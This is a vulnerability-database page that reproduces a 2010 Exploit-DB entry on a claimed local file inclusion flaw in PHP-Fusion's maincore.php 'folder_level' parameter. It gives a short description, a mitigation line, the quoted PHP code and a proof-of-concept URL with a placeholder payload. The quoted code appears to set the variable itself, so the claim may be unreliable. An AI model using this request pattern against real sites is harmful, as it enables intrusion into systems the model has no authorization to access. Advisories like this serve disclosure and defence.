PHP-Fusion Local File Includes Vulnerability

vendor:

PHP-Fusion

by:

MoDaMeR

7,5

CVSS

HIGH

Local File Includes

CWE

Product Name: PHP-Fusion

Affected Version From: all

Affected Version To: all

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2010

PHP-Fusion Local File Includes Vulnerability

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'folder_level' parameter to '/maincore.php' script. A remote attacker can include arbitrary local files and execute arbitrary PHP code on the vulnerable system.

Mitigation:

Input validation should be used to prevent the exploitation of this vulnerability.

Source

Exploit-DB raw data:

# Exploit Title:   PHP-Fusion Local File Includes Vulnerability
# Date: 2010/08/15
# Author: MoDaMeR
# Email: k@live.ma
# My Sites : www.v4-team.com & www.hackteach.org
# Script home: http://www.phpfusion-ar.com
# download Script:
http://www.phpfusion-ar.com/downloads.php?cat_id=1&download_id=91
# Version:all
# Tested on: Linux
# Team hacker:Mr.Mo0oM & Dr.xp
                          فلسطين كلنا فداءً لكِ
                         :::::::::::::::::::::::::
=================Exploit=================
maincore.php
[php]
 // Locate config.php and set the basedir path
$folder_level = ""; $i = 0;
while (!file_exists($folder_level."config.php")) {
    $folder_level .= "../"; $i++;
    if ($i == 5) { die("Config file not found"); }
}
require_once $folder_level."config.php";
define("BASEDIR", $folder_level);
[/php]
----exploit----

http://{localhost}/{path}/maincore.php?folder_level=LFI

---------greatz----------
Greatz to :
aB0 m0h4mM3d , and all v4-team & hackteach members